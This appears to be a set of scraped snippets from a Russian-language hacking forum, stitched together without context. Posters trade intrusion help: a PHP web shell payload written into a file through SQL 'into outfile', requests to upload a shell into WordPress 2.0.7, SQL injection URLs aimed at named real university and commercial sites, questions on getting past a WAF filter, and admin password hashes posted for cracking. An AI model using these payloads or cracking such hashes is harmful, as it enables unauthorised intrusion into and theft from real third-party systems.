Separate names with a comma.
обменял, все четко, спасибо )
может кавычки фильтруются? у меня так работало вроде: select '<?php eval($_REQUEST[cmd]); ?>' into outfile...
через админку
помогите залить шелл в вордпресс, плагины и теми защищены от записи, WordPress 2.0.7
http://genetics.rutgers.edu/?page=faculty/faculty_details&id=-1+union+select+1,2,3,4,5,6,7,TABLE_NAME,9,10,11,12,13,14,15+FROM+INFORMATION_SCHEMA.T...
сори у меня чет в мозиле не было хз почему )) а в хроме есть
такая ситуация: есть доступ в админку, есть аплоад файлов, лью shell.php, он заливается на сервер 100%, потому что я его потом через менеджер...
ну вот допустим http://www.justsims2.ru/ PHPSESSID доставляю ^ и вывод ошибки
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in...
ailadm:31b9293e32e298728b3931af0eb3f85b заранее спс :)
привет прогоните плз admin - $H$92wUjDd2FXB1YGbxdrCsKzpZt0CR201
admin:4ba460101f7abdb5 - mysql заранее спасибо
подскажите как обойти фильтр на from, в sql запросе?? /*!from*/ - не пускает FroM - не пускает тоисть version() , database(), user() это все...
может стоить попробывать программой, типа хавиджа
вообщем там WAF, и два запроса к базе: 1. http://www.dob.ee/listings.php?category=399)+order+by+2%23 - false, true...
